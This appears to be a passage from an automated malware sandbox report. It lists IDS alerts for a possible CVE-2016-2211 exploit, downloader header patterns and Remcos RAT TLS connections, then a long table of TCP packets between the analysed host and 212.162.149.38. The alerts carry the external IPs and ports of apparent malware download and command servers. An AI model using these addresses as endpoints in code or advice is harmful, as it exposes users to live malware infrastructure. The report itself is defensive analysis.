                                      2024-11-04T09:27:22.500689+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.849705TCP
                                      2024-11-04T09:27:31.787759+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.849709212.162.149.3880TCP
                                      2024-11-04T09:27:36.768609+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.849710162.251.122.1062404TCP
                                      2024-11-04T09:27:37.564253+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.849711162.251.122.1062404TCP
                                      2024-11-04T09:27:37.819920+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.849712178.237.33.5080TCP
                                      2024-11-04T09:28:01.311250+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.849713TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 4, 2024 09:27:31.134721041 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.139740944 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.139842033 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.139986992 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.144742966 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.787652969 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.787672043 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.787682056 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.787714958 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.787725925 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.787759066 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.787811995 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.799107075 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.799146891 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.799159050 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.799180031 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.799215078 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.799231052 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.799243927 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.799257040 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.799266100 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.799289942 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.799365997 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.799380064 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.799405098 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.799431086 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.911015034 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.911045074 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.911057949 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.911070108 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.911081076 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.911082029 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.911098957 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.911113024 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.911122084 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.911127090 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.911149979 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.911170006 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.911823988 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.911844015 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.911854982 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.911865950 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.911885023 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.922604084 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.922617912 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.922630072 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.922656059 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.922683001 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.922765017 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.922777891 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.922799110 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.922827005 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.922890902 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.922931910 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.922980070 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.922996044 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.923017025 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.923032999 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.923049927 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.923063040 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.923091888 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.923104048 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.923794985 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.923835993 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.923867941 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.923881054 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.923901081 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.923904896 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.923918009 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.923932076 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:31.924540043 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.924551010 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:31.924582005 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.034167051 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.034182072 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.034192085 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.034224987 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.034270048 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.034293890 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.034306049 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.034338951 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.034432888 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.034471035 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.034634113 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.034672976 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.034681082 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.034687042 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.034708977 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.034732103 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.034759045 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.034770966 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.034796953 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.034807920 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.035459042 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.035506964 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.035510063 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.035521030 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.035542965 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.035566092 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.035588980 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.035602093 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.035634995 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.036290884 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.036310911 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.036322117 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.036333084 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.036356926 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.036525965 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.036571026 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.045836926 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.045856953 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.045867920 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.045882940 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.045905113 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.045908928 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.045953989 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.045983076 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.045994997 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.046030045 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.046045065 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.046092033 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.046133041 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.046147108 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.046158075 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.046169043 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.046190977 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.046205044 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.046915054 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.046963930 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.047000885 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.047013998 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.047048092 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.047060013 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.047241926 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.047254086 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.047266006 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.047288895 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.047301054 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.047349930 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.047362089 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.047394037 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.047420979 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.047723055 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.047768116 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.047792912 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.047806025 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.047832966 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.047848940 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.047913074 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.047930956 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.047943115 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.047952890 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.047955990 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.047976971 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.048007011 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.048703909 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.048748970 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.048749924 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.048764944 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.048789024 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.048809052 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.089183092 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.089210987 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.089224100 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.089272976 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.089318037 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.157402039 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.157428026 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.157440901 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.157474995 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.157502890 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.157545090 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.157558918 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.157588005 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.157615900 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.157654047 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.157672882 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.157685995 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.157695055 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.157707930 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.157726049 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.157737017 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.157805920 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.157819033 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.157845020 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.157865047 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.157932997 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.157947063 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.157953978 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.157968998 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.157977104 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.157996893 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.158025026 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.158065081 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.158106089 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.158108950 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.158150911 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.158771992 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.158790112 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.158803940 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.158808947 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.158828974 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.158849001 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.158905983 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.158919096 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.158931971 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.158945084 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.158955097 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.158965111 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.158999920 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.159092903 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.159106016 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.159131050 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.159143925 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.159460068 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.159512997 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.159531116 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.159543991 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.159564972 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.159588099 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.159612894 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.159626961 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.159638882 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.159653902 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.159667969 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.159686089 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.159770012 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.159784079 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.159811974 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.159821033 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.159831047 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.159866095 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.160387039 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.160399914 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.160413027 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.160435915 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.160437107 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.160464048 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.160479069 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169099092 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169111967 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169125080 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169156075 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169171095 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169203043 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169219017 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169255018 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169269085 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169337034 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169351101 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169363022 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169374943 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169384003 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169389009 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169415951 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169450998 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169522047 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169568062 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169681072 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169728994 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169743061 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169756889 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169789076 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169801950 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169867992 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169903994 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169914961 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169917107 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.169945002 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.169970036 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170031071 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170043945 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170072079 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170088053 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170170069 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170209885 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170248032 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170262098 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170290947 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170305014 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170387983 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170401096 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170413971 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170428038 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170438051 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170454025 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170490026 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170515060 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170557022 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170594931 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170608044 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170638084 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170650959 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.170861959 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170938969 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170950890 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.170984983 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.171020985 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.171034098 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.171051979 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.171077967 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.212682962 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.212719917 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.212730885 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.212734938 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.212793112 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.212819099 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.212819099 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.212894917 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.280586958 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.280670881 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.280683994 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.280731916 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.280776024 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.280832052 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.280843973 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.280879021 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.280904055 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.280915022 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.280930996 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.280942917 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.280963898 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.280988932 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281080961 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281174898 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281186104 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281203032 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281214952 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281220913 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281229019 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281244040 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281258106 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281285048 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281433105 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281476021 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.281487942 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.281506062 CET8049709212.162.149.38192.168.2.8
